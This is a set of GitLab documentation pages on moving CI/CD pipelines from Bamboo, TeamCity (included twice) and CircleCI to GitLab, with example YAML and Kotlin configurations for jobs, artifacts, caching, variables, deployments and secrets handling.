workflow:
  rules:
    - changes:
        - .gitlab/**/**.md
      when: never
```

#### Artifacts

You can define job artifacts using the `artifacts` keyword in both GitLab and Bamboo. For example, in a Bamboo build plan:

```yaml
version: 2
# ...
Build:
  # ...
  artifacts:
    - name: Test Reports
      location: target/reports
      pattern: '*.xml'
      required: false
      shared: false
    - name: Special Reports
      location: target/reports
      pattern: 'special/*.xml'
      shared: true
```

In this example, artifacts are defined with a name, location, and pattern. You can also share the artifacts with other jobs and plans, or define jobs that subscribe to the artifact.

`artifact-subscriptions` is used to access artifacts from another job in the same plan, for example:

```yaml
Test app:
  artifact-subscriptions:
    - artifact: Test Reports
      destination: deploy
```

`artifact-download` is used to access artifacts from jobs in a different plan, for example:

```yaml
version: 2
# ...
Build:
  # ...
  tasks:
    - artifact-download:
        source-plan: PROJECTKEY-PLANKEY
```

You need to provide the key of the plan you are downloading artifacts from in the `source-plan` keyword.

In GitLab, all [artifacts](../jobs/job_artifacts.md) from completed jobs in earlier stages are downloaded by default. For example, in a GitLab CI/CD `.gitlab-ci.yml` file:

```yaml
stages:
  - build

pdf:
  stage: build
  script:
    - # generate XML reports
  artifacts:
    name: "test-report-files"
    untracked: true
    paths:
      - target/reports
```

In this example:

- The name of the artifact is specified explicitly, but you can make it dynamic by using a CI/CD variable.
- The `untracked` keyword sets the artifact to also include Git untracked files, along with those specified explicitly with `paths`.
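When a job should not fetch every earlier artifact, the `dependencies` keyword restricts which jobs' artifacts are downloaded. The following sketch is a rough GitLab equivalent of a Bamboo artifact subscription; the job names and report contents are illustrative:

```yaml
stages:
  - build
  - deploy

pdf:
  stage: build
  script:
    # Produce a report file to publish as an artifact (illustrative)
    - mkdir -p target/reports && echo "<report/>" > target/reports/out.xml
  artifacts:
    paths:
      - target/reports

publish:
  stage: deploy
  # Download artifacts only from the `pdf` job,
  # instead of from every job in earlier stages.
  dependencies:
    - pdf
  script:
    - ls target/reports
```

An empty `dependencies: []` list disables artifact downloads for a job entirely.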
#### Caching

In Bamboo, [Git caches](https://confluence.atlassian.com/bamkb/how-stored-git-caches-speed-up-builds-690848923.html) can be used to speed up builds. Git caches are configured in the Bamboo administration settings and are stored either on the Bamboo server or on remote agents.

GitLab supports both Git caches and job caches. [Caches](../caching/_index.md) are defined per job using the `cache` keyword. For example, in a GitLab CI/CD `.gitlab-ci.yml` file:

```yaml
test-job:
  stage: build
  cache:
    - key:
        files:
          - Gemfile.lock
      paths:
        - vendor/ruby
    - key:
        files:
          - yarn.lock
      paths:
        - .yarn-cache/
  script:
    - bundle config set --local path 'vendor/ruby'
    - bundle install
    - yarn install --cache-folder .yarn-cache
    - echo Run tests...
```

#### Deployment Projects

Bamboo has [Deployment projects](https://confluence.atlassian.com/bamboo/deployment-projects-338363438.html), which link to Build plans to track, fetch, and deploy artifacts to [deployment environments](https://confluence.atlassian.com/bamboo0903/creating-a-deployment-environment-1236445634.html). When creating a deployment project, you link it to a build plan, then specify the deployment environment and the tasks that perform the deployments.

A [deployment task](https://confluence.atlassian.com/bamboo0903/tasks-for-deployment-environments-1236445662.html) can either be a script or a Bamboo task from the Atlassian marketplace. For example, in a Deployment project Spec:

```yaml
version: 2
deployment:
  name: Deploy ruby app
  source-plan: build-app
release-naming: release-1.0
environments:
  - Production

Production:
  tasks:
    - # scripts to deploy app to production
    - ./.ci/deploy_prod.sh
```

In GitLab CI/CD, you can create a [deployment job](../jobs/_index.md#deployment-jobs) that deploys to an [environment](../environments/_index.md) or creates a [release](../../user/project/releases/_index.md).
For example, in a GitLab CI/CD `.gitlab-ci.yml` file:

```yaml
deploy-to-production:
  stage: deploy
  script:
    - # Run Deployment script
    - ./.ci/deploy_prod.sh
  environment:
    name: production
```

To create a release instead, use the [`release`](../yaml/_index.md#release) keyword with the [release-cli](https://gitlab.com/gitlab-org/release-cli/-/tree/master/docs) tool to create releases for [Git tags](../../user/project/repository/tags/_index.md). For example, in a GitLab CI/CD `.gitlab-ci.yml` file:

```yaml
release_job:
  stage: release
  image: registry.gitlab.com/gitlab-org/release-cli:latest
  rules:
    - if: $CI_COMMIT_TAG  # Run this job when a tag is created manually
  script:
    - echo "Building release version"
  release:
    tag_name: $CI_COMMIT_TAG
    name: 'Release $CI_COMMIT_TAG'
    description: 'Release created using the release-cli.'
```

### Security Scanning features

Bamboo relies on third-party tasks provided in the Atlassian Marketplace to run security scans. GitLab provides [security scanners](../../user/application_security/_index.md) out-of-the-box to detect vulnerabilities in all parts of the SDLC. You can add these scanners in GitLab using templates. For example, to add SAST scanning to your pipeline, add the following to your `.gitlab-ci.yml`:

```yaml
include:
  - template: Jobs/SAST.gitlab-ci.yml
```

You can customize the behavior of security scanners by using CI/CD variables, for example with the [SAST scanners](../../user/application_security/sast/_index.md#available-cicd-variables).

### Secrets Management

Privileged information, often referred to as "secrets", is sensitive information or credentials you need in your CI/CD workflow. You might use secrets to unlock protected resources or sensitive information in tools, applications, containers, and cloud-native environments.
Secrets management in Bamboo is usually handled using [Shared credentials](https://confluence.atlassian.com/bamboo/shared-credentials-424313357.html), or via third-party applications from the Atlassian Marketplace.

For secrets management in GitLab, you can use one of the supported integrations for an external service. These services securely store secrets outside of your GitLab project, though you must have a subscription for the service:

- [HashiCorp Vault](../secrets/hashicorp_vault.md)
- [Azure Key Vault](../secrets/azure_key_vault.md)
- [Google Cloud Secret Manager](../secrets/gcp_secret_manager.md)

GitLab also supports [OIDC authentication](../secrets/id_token_authentication.md) for other third-party services that support OIDC.

Additionally, you can make credentials available to jobs by storing them in CI/CD variables, though secrets stored in plain text are susceptible to accidental exposure, [the same as in Bamboo](https://confluence.atlassian.com/bamboo/bamboo-specs-encryption-970268127.html). You should always store sensitive information in [masked](../variables/_index.md#mask-a-cicd-variable) and [protected](../variables/_index.md#protect-a-cicd-variable) variables, which mitigates some of the risk.

Also, never store secrets as variables in your `.gitlab-ci.yml` file, which is visible to all users with access to the project. Storing sensitive information in variables should only be done in [the project, group, or instance settings](../variables/_index.md#define-a-cicd-variable-in-the-ui).

Review the [security guidelines](../variables/_index.md#cicd-variable-security) to improve the safety of your CI/CD variables.

### Migration Plan

The following list of recommended steps was created after observing organizations that were able to quickly complete this migration.

#### Create a Migration Plan

Before starting a migration, you should create a [migration plan](plan_a_migration.md) to make preparations for the migration.
For a migration from Bamboo, ask yourself the following questions in preparation:

- What Bamboo Tasks are used by jobs in Bamboo today?
  - Do you know what these Tasks do exactly?
  - Do any Tasks wrap a common build tool? For example, Maven, Gradle, or NPM?
- What is installed on the Bamboo agents?
- Are there any shared libraries in use?
- How are you authenticating from Bamboo? Are you using SSH keys, API tokens, or other secrets?
- Are there other projects that you need to access from your pipeline?
- Are there credentials in Bamboo to access outside services? For example Ansible Tower, Artifactory, or other cloud providers or deployment targets?

#### Prerequisites

Before doing any migration work, you should first:

1. Get familiar with GitLab.
   - Read about the [key GitLab CI/CD features](../_index.md).
   - Follow tutorials to create [your first GitLab pipeline](../quick_start/_index.md) and [more complex pipelines](../quick_start/tutorial.md) that build, test, and deploy a static site.
   - Review the [CI/CD YAML syntax reference](../yaml/_index.md).
1. Set up and configure GitLab.
1. Test your GitLab instance.
   - Ensure [runners](../runners/_index.md) are available, either by using shared GitLab.com runners or installing new runners.

#### Migration Steps

1. Migrate projects from your SCM solution to GitLab.
   - (Recommended) You can use the available [importers](../../user/project/import/_index.md) to automate mass imports from external SCM providers.
   - You can [import repositories by URL](../../user/project/import/repo_by_url.md).
1. Create a `.gitlab-ci.yml` file in each project.
1. Export your Bamboo Projects/Plans as YAML Specs.
1. Migrate the Bamboo YAML Spec configuration to GitLab CI/CD jobs and configure them to show results directly in merge requests.
1. Migrate deployment jobs by using [cloud deployment templates](../cloud_deployment/_index.md), [environments](../environments/_index.md), and the [GitLab agent for Kubernetes](../../user/clusters/agent/_index.md).
1. Check if any CI/CD configuration can be reused across different projects, then create and share CI/CD templates.
1. Check the [pipeline efficiency documentation](../pipelines/pipeline_efficiency.md) to learn how to make your GitLab CI/CD pipelines faster and more efficient.

If you have questions that are not answered here, the [GitLab community forum](https://forum.gitlab.com/) can be a great resource.
---
stage: Verify
group: Pipeline Execution
info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
title: Migrating from TeamCity
breadcrumbs:
- doc
- ci
- migration
---
{{< details >}}

- Tier: Free, Premium, Ultimate
- Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated

{{< /details >}}

If you're migrating from TeamCity to GitLab CI/CD, you can create CI/CD pipelines that replicate and enhance your TeamCity workflows.

## Key similarities and differences

GitLab CI/CD and TeamCity are CI/CD tools with some similarities. Both GitLab and TeamCity:

- Are flexible enough to run jobs for most languages.
- Can be deployed either on-premises or in the cloud.

Additionally, there are some important differences between the two:

- GitLab CI/CD pipelines are configured in a YAML format configuration file, which you can edit manually or with the [pipeline editor](../pipeline_editor/_index.md). TeamCity pipelines can be configured from the UI or using the Kotlin DSL.
- GitLab is a DevSecOps platform with built-in SCM, container registry, security scanning, and more. TeamCity requires separate solutions for these capabilities, usually provided by integrations.

### Configuration file

TeamCity can be [configured from the UI](https://www.jetbrains.com/help/teamcity/creating-and-editing-build-configurations.html) or in a [TeamCity configuration file in the Kotlin DSL format](https://www.jetbrains.com/help/teamcity/kotlin-dsl.html). A TeamCity build configuration is a set of instructions that defines how a software project should be built, tested, and deployed. The configuration includes the parameters and settings necessary for automating the CI/CD process in TeamCity.

In GitLab, the equivalent of a TeamCity build configuration is the `.gitlab-ci.yml` file. This file defines the CI/CD pipeline for a project, specifying the stages, jobs, and commands needed to build, test, and deploy the project.

## Comparison of features and concepts

Many TeamCity features and concepts have equivalents in GitLab that offer the same functionality.
### Jobs

TeamCity uses build configurations, which consist of multiple build steps where you define commands or scripts to execute tasks such as compiling code, running tests, and packaging artifacts.

The following is an example of a TeamCity project configuration in the Kotlin DSL format that builds a Dockerfile and runs unit tests:

```kotlin
package _Self.buildTypes

import jetbrains.buildServer.configs.kotlin.*
import jetbrains.buildServer.configs.kotlin.buildFeatures.perfmon
import jetbrains.buildServer.configs.kotlin.buildSteps.dockerCommand
import jetbrains.buildServer.configs.kotlin.buildSteps.nodeJS
import jetbrains.buildServer.configs.kotlin.triggers.vcs

object BuildTest : BuildType({
    name = "Build & Test"

    vcs {
        root(HttpsGitlabComRutshahCicdDemoGitRefsHeadsMain)
    }

    steps {
        dockerCommand {
            id = "DockerCommand"
            commandType = build {
                source = file {
                    path = "Dockerfile"
                }
            }
        }
        nodeJS {
            id = "nodejs_runner"
            workingDir = "app"
            shellScript = """
                npm install jest-teamcity --no-save
                npm run test -- --reporters=jest-teamcity
            """.trimIndent()
        }
    }

    triggers {
        vcs {
        }
    }

    features {
        perfmon {
        }
    }
})
```

In GitLab CI/CD, you define jobs with the tasks to execute as part of the pipeline. Each job can have one or more build steps defined in it. The equivalent GitLab CI/CD `.gitlab-ci.yml` file for the previous example would be:

```yaml
workflow:
  rules:
    - if: $CI_COMMIT_BRANCH != "main" || $CI_PIPELINE_SOURCE != "merge_request_event"
      when: never
    - when: always

stages:
  - build
  - test

build-job:
  image: docker:20.10.16
  stage: build
  services:
    - docker:20.10.16-dind
  script:
    - docker build -t cicd-demo:0.1 .

run_unit_tests:
  image: node:17-alpine3.14
  stage: test
  before_script:
    - cd app
    - npm install
  script:
    - npm test
  artifacts:
    when: always
    reports:
      junit: app/junit.xml
```

### Pipeline triggers

[TeamCity triggers](https://www.jetbrains.com/help/teamcity/configuring-build-triggers.html) define conditions that initiate a build, including VCS changes, scheduled triggers, or builds triggered by other builds.

In GitLab CI/CD, pipelines can be triggered automatically for various events, like changes to branches or merge requests and new tags. Pipelines can also be triggered manually, using an [API](../triggers/_index.md), or with [scheduled pipelines](../pipelines/schedules.md). For more information, see [CI/CD pipelines](../pipelines/_index.md).

### Variables

In TeamCity, you [define build parameters and environment variables](https://www.jetbrains.com/help/teamcity/using-build-parameters.html) in the build configuration settings.

In GitLab, use the `variables` keyword to define [CI/CD variables](../variables/_index.md). Use variables to reuse configuration data, have more dynamic configuration, or store important values. Variables can be defined either globally or per job.

For example, a GitLab CI/CD `.gitlab-ci.yml` file that uses variables:

```yaml
default:
  image: alpine:latest

stages:
  - greet

variables:
  NAME: "Fern"

english:
  stage: greet
  variables:
    GREETING: "Hello"
  script:
    - echo "$GREETING $NAME"

spanish:
  stage: greet
  variables:
    GREETING: "Hola"
  script:
    - echo "$GREETING $NAME"
```

### Artifacts

Build configurations in TeamCity allow you to define [artifacts](https://www.jetbrains.com/help/teamcity/build-artifact.html) generated during the build process.

In GitLab, any job can use the [`artifacts`](../yaml/_index.md#artifacts) keyword to define a set of artifacts to be stored when a job completes. [Artifacts](../jobs/job_artifacts.md) are files that can be used in later jobs, for testing or deployment.
For example, a GitLab CI/CD `.gitlab-ci.yml` file that uses artifacts: ```yaml stage: - generate - use generate_cat: stage: generate script: - touch cat.txt - echo "meow" > cat.txt artifacts: paths: - cat.txt expire_in: 1 week use_cat: stage: use script: - cat cat.txt ``` ### Runners The equivalent of [TeamCity agents](https://www.jetbrains.com/help/teamcity/build-agent.html) in GitLab are Runners. In GitLab CI/CD, runners are the services that execute jobs. If you are using GitLab.com, you can use the [instance runner fleet](../runners/_index.md) to run jobs without provisioning your own self-managed runners. Some key details about runners: - Runners can be [configured](../runners/runners_scope.md) to be shared across an instance, a group, or dedicated to a single project. - You can use the [`tags` keyword](../runners/configure_runners.md#control-jobs-that-a-runner-can-run) for finer control, and associate runners with specific jobs. For example, you can use a tag for jobs that require dedicated, more powerful, or specific hardware. - GitLab has [autoscaling for runners](https://docs.gitlab.com/runner/runner_autoscale/). Use autoscaling to provision runners only when needed and scale down when not needed. ### TeamCity build features & plugins Some functionality in TeamCity that is enabled through build features & plugins is supported in GitLab CI/CD natively with CI/CD keywords and features. 
| TeamCity plugin | GitLab feature | |------------------------------------------------------------------------------------------------------------------------------------|----------------| | [Code coverage](https://www.jetbrains.com/help/teamcity/configuring-test-reports-and-code-coverage.html#Code+Coverage+in+TeamCity) | [Code coverage](../testing/code_coverage/_index.md) and [Test coverage visualization](../testing/code_coverage/_index.md#coverage-visualization) | | [Unit Test Report](https://www.jetbrains.com/help/teamcity/configuring-test-reports-and-code-coverage.html) | [JUnit test report artifacts](../yaml/artifacts_reports.md#artifactsreportsjunit) and [Unit test reports](../testing/unit_test_reports.md) | | [Notifications](https://www.jetbrains.com/help/teamcity/configuring-notifications.html) | [Notification emails](../../user/profile/notifications.md) and [Slack](../../user/project/integrations/gitlab_slack_application.md) | ## Planning and performing a migration The following list of recommended steps was created after observing organizations that were able to quickly complete a migration to GitLab CI/CD. ### Create a migration plan Before starting a migration you should create a [migration plan](plan_a_migration.md) to make preparations for the migration. For a migration from TeamCity, ask yourself the following questions in preparation: - What plugins are used by jobs in TeamCity today? - Do you know what these plugins do exactly? - What is installed on the TeamCity agents? - Are there any shared libraries in use? - How are you authenticating from TeamCity? Are you using SSH keys, API tokens, or other secrets? - Are there other projects that you need to access from your pipeline? - Are there credentials in TeamCity to access outside services? For example Ansible Tower, Artifactory, or other Cloud Providers or deployment targets? ### Prerequisites Before doing any migration work, you should first: 1. Get familiar with GitLab. 
- Read about the [key GitLab CI/CD features](../_index.md). - Follow tutorials to create [your first GitLab pipeline](../quick_start/_index.md) and [more complex pipelines](../quick_start/tutorial.md) that build, test, and deploys a static site. - Review the [CI/CD YAML syntax reference](../yaml/_index.md). 1. Set up and configure GitLab. 1. Test your GitLab instance. - Ensure [runners](../runners/_index.md) are available, either by using shared GitLab.com runners or installing new runners. ### Migration steps 1. Migrate projects from your SCM solution to GitLab. - (Recommended) You can use the available [importers](../../user/project/import/_index.md) to automate mass imports from external SCM providers. - You can [import repositories by URL](../../user/project/import/repo_by_url.md). 1. Create a `.gitlab-ci.yml` file in each project. 1. Migrate TeamCity configuration to GitLab CI/CD jobs and configure them to show results directly in merge requests. 1. Migrate deployment jobs by using [cloud deployment templates](../cloud_deployment/_index.md), [environments](../environments/_index.md), and the [GitLab agent for Kubernetes](../../user/clusters/agent/_index.md). 1. Check if any CI/CD configuration can be reused across different projects, then create and share [CI/CD templates](../examples/_index.md#cicd-templates) or [CI/CD components](../components/_index.md). 1. See [pipeline efficiency](../pipelines/pipeline_efficiency.md) to learn how to make your GitLab CI/CD pipelines faster and more efficient. If you have questions that are not answered here, the [GitLab community forum](https://forum.gitlab.com/) can be a great resource.
---
stage: Verify
group: Pipeline Execution
info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
title: Migrating from TeamCity
breadcrumbs:
- doc
- ci
- migration
---

{{< details >}}

- Tier: Free, Premium, Ultimate
- Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated

{{< /details >}}

If you're migrating from TeamCity to GitLab CI/CD, you can create CI/CD pipelines that replicate and enhance your TeamCity workflows.

## Key similarities and differences

GitLab CI/CD and TeamCity are CI/CD tools with some similarities. Both GitLab and TeamCity:

- Are flexible enough to run jobs for most languages.
- Can be deployed either on-premises or in the cloud.

Additionally, there are some important differences between the two:

- GitLab CI/CD pipelines are configured in a YAML format configuration file, which you can edit manually or with the [pipeline editor](../pipeline_editor/_index.md). TeamCity pipelines can be configured from the UI or using Kotlin DSL.
- GitLab is a DevSecOps platform with built-in SCM, container registry, security scanning, and more. TeamCity requires separate solutions for these capabilities, usually provided by integrations.

### Configuration file

TeamCity can be [configured from the UI](https://www.jetbrains.com/help/teamcity/creating-and-editing-build-configurations.html) or in the [`TeamCity Configuration` file in the Kotlin DSL format](https://www.jetbrains.com/help/teamcity/kotlin-dsl.html).

A TeamCity build configuration is a set of instructions that defines how a software project should be built, tested, and deployed. The configuration includes parameters and settings necessary for automating the CI/CD process in TeamCity.

In GitLab, the equivalent of a TeamCity build configuration is the `.gitlab-ci.yml` file.
This file defines the CI/CD pipeline for a project, specifying the stages, jobs, and commands needed to build, test, and deploy the project. ## Comparison of features and concepts Many TeamCity features and concepts have equivalents in GitLab that offer the same functionality. ### Jobs TeamCity uses build configurations, which consist of multiple build steps where you define commands or scripts to execute tasks such as compiling code, running tests, and packaging artifacts. The following is an example of a TeamCity project configuration in a Kotlin DSL format that builds a Docker file and runs unit tests: ```kotlin package _Self.buildTypes import jetbrains.buildServer.configs.kotlin.* import jetbrains.buildServer.configs.kotlin.buildFeatures.perfmon import jetbrains.buildServer.configs.kotlin.buildSteps.dockerCommand import jetbrains.buildServer.configs.kotlin.buildSteps.nodeJS import jetbrains.buildServer.configs.kotlin.triggers.vcs object BuildTest : BuildType({ name = "Build & Test" vcs { root(HttpsGitlabComRutshahCicdDemoGitRefsHeadsMain) } steps { dockerCommand { id = "DockerCommand" commandType = build { source = file { path = "Dockerfile" } } } nodeJS { id = "nodejs_runner" workingDir = "app" shellScript = """ npm install jest-teamcity --no-save npm run test -- --reporters=jest-teamcity """.trimIndent() } } triggers { vcs { } } features { perfmon { } } }) ``` In GitLab CI/CD, you define jobs with the tasks to execute as part of the pipeline. Each job can have one or more build steps defined in it. The equivalent GitLab CI/CD `.gitlab-ci.yml` file for the previous example would be: ```yaml workflow: rules: - if: $CI_COMMIT_BRANCH != "main" || $CI_PIPELINE_SOURCE != "merge_request_event" when: never - when: always stages: - build - test build-job: image: docker:20.10.16 stage: build services: - docker:20.10.16-dind script: - docker build -t cicd-demo:0.1 . 
run_unit_tests: image: node:17-alpine3.14 stage: test before_script: - cd app - npm install script: - npm test artifacts: when: always reports: junit: app/junit.xml ``` ### Pipeline triggers [TeamCity Triggers](https://www.jetbrains.com/help/teamcity/configuring-build-triggers.html) define conditions that initiate a build, including VCS changes, scheduled triggers, or builds triggered by other builds. In GitLab CI/CD, pipelines can be triggered automatically for various events, like changes to branches or merge requests and new tags. Pipelines can also be triggered manually, using an [API](../triggers/_index.md), or with [scheduled pipelines](../pipelines/schedules.md). For more information, see [CI/CD pipelines](../pipelines/_index.md). ### Variables In TeamCity, you [define build parameters and environment variables](https://www.jetbrains.com/help/teamcity/using-build-parameters.html) in the build configuration settings. In GitLab, use the `variables` keyword to define [CI/CD variables](../variables/_index.md). Use variables to reuse configuration data, have more dynamic configuration, or store important values. Variables can be defined either globally or per job. For example, a GitLab CI/CD `.gitlab-ci.yml` file that uses variables: ```yaml default: image: alpine:latest stages: - greet variables: NAME: "Fern" english: stage: greet variables: GREETING: "Hello" script: - echo "$GREETING $NAME" spanish: stage: greet variables: GREETING: "Hola" script: - echo "$GREETING $NAME" ``` ### Artifacts Build configurations in TeamCity allow you to define [artifacts](https://www.jetbrains.com/help/teamcity/build-artifact.html) generated during the build process. In GitLab, any job can use the [`artifacts`](../yaml/_index.md#artifacts) keyword to define a set of artifacts to be stored when a job completes. [Artifacts](../jobs/job_artifacts.md) are files that can be used in later jobs, for testing or deployment. 
For example, a GitLab CI/CD `.gitlab-ci.yml` file that uses artifacts:

```yaml
stages:
  - generate
  - use

generate_cat:
  stage: generate
  script:
    - touch cat.txt
    - echo "meow" > cat.txt
  artifacts:
    paths:
      - cat.txt
    expire_in: 1 week

use_cat:
  stage: use
  script:
    - cat cat.txt
```

### Runners

The equivalent of [TeamCity agents](https://www.jetbrains.com/help/teamcity/build-agent.html) in GitLab are Runners. In GitLab CI/CD, runners are the services that execute jobs. If you are using GitLab.com, you can use the [instance runner fleet](../runners/_index.md) to run jobs without provisioning your own self-managed runners.

Some key details about runners:

- Runners can be [configured](../runners/runners_scope.md) to be shared across an instance, a group, or dedicated to a single project.
- You can use the [`tags` keyword](../runners/configure_runners.md#control-jobs-that-a-runner-can-run) for finer control, and associate runners with specific jobs. For example, you can use a tag for jobs that require dedicated, more powerful, or specific hardware.
- GitLab has [autoscaling for runners](https://docs.gitlab.com/runner/runner_autoscale/). Use autoscaling to provision runners only when needed and scale down when not needed.

### TeamCity build features & plugins

Some functionality in TeamCity that is enabled through build features & plugins is supported in GitLab CI/CD natively with CI/CD keywords and features.
| TeamCity plugin | GitLab feature | |------------------------------------------------------------------------------------------------------------------------------------|----------------| | [Code coverage](https://www.jetbrains.com/help/teamcity/configuring-test-reports-and-code-coverage.html#Code+Coverage+in+TeamCity) | [Code coverage](../testing/code_coverage/_index.md) and [Test coverage visualization](../testing/code_coverage/_index.md#coverage-visualization) | | [Unit Test Report](https://www.jetbrains.com/help/teamcity/configuring-test-reports-and-code-coverage.html) | [JUnit test report artifacts](../yaml/artifacts_reports.md#artifactsreportsjunit) and [Unit test reports](../testing/unit_test_reports.md) | | [Notifications](https://www.jetbrains.com/help/teamcity/configuring-notifications.html) | [Notification emails](../../user/profile/notifications.md) and [Slack](../../user/project/integrations/gitlab_slack_application.md) | ## Planning and performing a migration The following list of recommended steps was created after observing organizations that were able to quickly complete a migration to GitLab CI/CD. ### Create a migration plan Before starting a migration you should create a [migration plan](plan_a_migration.md) to make preparations for the migration. For a migration from TeamCity, ask yourself the following questions in preparation: - What plugins are used by jobs in TeamCity today? - Do you know what these plugins do exactly? - What is installed on the TeamCity agents? - Are there any shared libraries in use? - How are you authenticating from TeamCity? Are you using SSH keys, API tokens, or other secrets? - Are there other projects that you need to access from your pipeline? - Are there credentials in TeamCity to access outside services? For example Ansible Tower, Artifactory, or other Cloud Providers or deployment targets? ### Prerequisites Before doing any migration work, you should first: 1. Get familiar with GitLab. 
   - Read about the [key GitLab CI/CD features](../_index.md).
   - Follow tutorials to create [your first GitLab pipeline](../quick_start/_index.md) and [more complex pipelines](../quick_start/tutorial.md) that build, test, and deploy a static site.
   - Review the [CI/CD YAML syntax reference](../yaml/_index.md).
1. Set up and configure GitLab.
1. Test your GitLab instance.
   - Ensure [runners](../runners/_index.md) are available, either by using shared GitLab.com runners or installing new runners.

### Migration steps

1. Migrate projects from your SCM solution to GitLab.
   - (Recommended) You can use the available [importers](../../user/project/import/_index.md) to automate mass imports from external SCM providers.
   - You can [import repositories by URL](../../user/project/import/repo_by_url.md).
1. Create a `.gitlab-ci.yml` file in each project.
1. Migrate TeamCity configuration to GitLab CI/CD jobs and configure them to show results directly in merge requests.
1. Migrate deployment jobs by using [cloud deployment templates](../cloud_deployment/_index.md), [environments](../environments/_index.md), and the [GitLab agent for Kubernetes](../../user/clusters/agent/_index.md).
1. Check if any CI/CD configuration can be reused across different projects, then create and share [CI/CD templates](../examples/_index.md#cicd-templates) or [CI/CD components](../components/_index.md).
1. See [pipeline efficiency](../pipelines/pipeline_efficiency.md) to learn how to make your GitLab CI/CD pipelines faster and more efficient.

If you have questions that are not answered here, the [GitLab community forum](https://forum.gitlab.com/) can be a great resource.
https://docs.gitlab.com/ci/circleci
https://gitlab.com/gitlab-org/gitlab/-/tree/master/doc/ci/circleci.md
2025-08-13
doc/ci/migration
[ "doc", "ci", "migration" ]
circleci.md
Verify
Pipeline Authoring
To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
Migrating from CircleCI
null
--- stage: Verify group: Pipeline Authoring info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments title: Migrating from CircleCI breadcrumbs: - doc - ci - migration --- {{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} If you are currently using CircleCI, you can migrate your CI/CD pipelines to [GitLab CI/CD](../_index.md), and start making use of all its powerful features. We have collected several resources that you may find useful before starting to migrate. The [Quick Start Guide](../quick_start/_index.md) is a good overview of how GitLab CI/CD works. You may also be interested in [Auto DevOps](../../topics/autodevops/_index.md) which can be used to build, test, and deploy your applications with little to no configuration needed at all. For advanced CI/CD teams, [custom project templates](../../administration/custom_project_templates.md) can enable the reuse of pipeline configurations. If you have questions that are not answered here, the [GitLab community forum](https://forum.gitlab.com/) can be a great resource. ## `config.yml` vs `.gitlab-ci.yml` CircleCI's `config.yml` configuration file defines scripts, jobs, and workflows (known as "stages" in GitLab). In GitLab, a similar approach is used with a `.gitlab-ci.yml` file in the root directory of your repository. ### Jobs In CircleCI, jobs are a collection of steps to perform a specific task. In GitLab, [jobs](../jobs/_index.md) are also a fundamental element in the configuration file. The `checkout` keyword is not necessary in GitLab CI/CD as the repository is automatically fetched. 
CircleCI example job definition: ```yaml jobs: job1: steps: - checkout - run: "execute-script-for-job1" ``` Example of the same job definition in GitLab CI/CD: ```yaml job1: script: "execute-script-for-job1" ``` ### Docker image definition CircleCI defines images at the job level, which is also supported by GitLab CI/CD. Additionally, GitLab CI/CD supports setting this globally to be used by all jobs that don't have `image` defined. CircleCI example image definition: ```yaml jobs: job1: docker: - image: ruby:2.6 ``` Example of the same image definition in GitLab CI/CD: ```yaml job1: image: ruby:2.6 ``` ### Workflows CircleCI determines the run order for jobs with `workflows`. This is also used to determine concurrent, sequential, scheduled, or manual runs. The equivalent function in GitLab CI/CD is called [stages](../yaml/_index.md#stages). Jobs on the same stage run in parallel, and only run after previous stages complete. Execution of the next stage is skipped when a job fails by default, but this can be allowed to continue even [after a failed job](../yaml/_index.md#allow_failure). See [the Pipeline Architecture Overview](../pipelines/pipeline_architectures.md) for guidance on different types of pipelines that you can use. Pipelines can be tailored to meet your needs, such as for a large complex project or a monorepo with independent defined components. #### Parallel and sequential job execution The following examples show how jobs can run in parallel, or sequentially: 1. `job1` and `job2` run in parallel (in the `build` stage for GitLab CI/CD). 1. `job3` runs only after `job1` and `job2` complete successfully (in the `test` stage). 1. `job4` runs only after `job3` completes successfully (in the `deploy` stage). 
CircleCI example with `workflows`: ```yaml version: 2 jobs: job1: steps: - checkout - run: make build dependencies job2: steps: - run: make build artifacts job3: steps: - run: make test job4: steps: - run: make deploy workflows: version: 2 jobs: - job1 - job2 - job3: requires: - job1 - job2 - job4: requires: - job3 ``` Example of the same workflow as `stages` in GitLab CI/CD: ```yaml stages: - build - test - deploy job1: stage: build script: make build dependencies job2: stage: build script: make build artifacts job3: stage: test script: make test job4: stage: deploy script: make deploy environment: production ``` #### Scheduled run GitLab CI/CD has an easy to use UI to [schedule pipelines](../pipelines/schedules.md). Also, [rules](../yaml/_index.md#rules) can be used to determine if jobs should be included or excluded from a scheduled pipeline. CircleCI example of a scheduled workflow: ```yaml commit-workflow: jobs: - build scheduled-workflow: triggers: - schedule: cron: "0 1 * * *" filters: branches: only: try-schedule-workflow jobs: - build ``` Example of the same scheduled pipeline using [`rules`](../yaml/_index.md#rules) in GitLab CI/CD: ```yaml job1: script: - make build rules: - if: $CI_PIPELINE_SOURCE == "schedule" && $CI_COMMIT_REF_NAME == "try-schedule-workflow" ``` After the pipeline configuration is saved, you configure the cron schedule in the [GitLab UI](../pipelines/schedules.md#add-a-pipeline-schedule), and can enable or disable schedules in the UI as well. 
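The scheduled pipeline example above shows how to include a job only in scheduled pipelines; `rules` can also exclude a job from them. A minimal sketch (the job name and script are illustrative, not from the CircleCI example):

```yaml
# Hypothetical job that runs in every pipeline except scheduled ones
lint_job:
  script:
    - make lint
  rules:
    - if: $CI_PIPELINE_SOURCE == "schedule"
      when: never
    - when: on_success
```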
#### Manual run

CircleCI example of a manual workflow:

```yaml
release-branch-workflow:
  jobs:
    - build
    - testing:
        requires:
          - build
    - deploy:
        type: approval
        requires:
          - testing
```

Example of the same workflow using [`when: manual`](../jobs/job_control.md#create-a-job-that-must-be-run-manually) in GitLab CI/CD:

```yaml
deploy_prod:
  stage: deploy
  script:
    - echo "Deploy to production server"
  when: manual
  environment: production
```

### Filter job by branch

[Rules](../yaml/_index.md#rules) are a mechanism to determine if the job runs for a specific branch.

CircleCI example of a job filtered by branch:

```yaml
jobs:
  deploy:
    branches:
      only:
        - main
        - /rc-.*/
```

Example of the same workflow using `rules` in GitLab CI/CD:

```yaml
deploy:
  stage: deploy
  script:
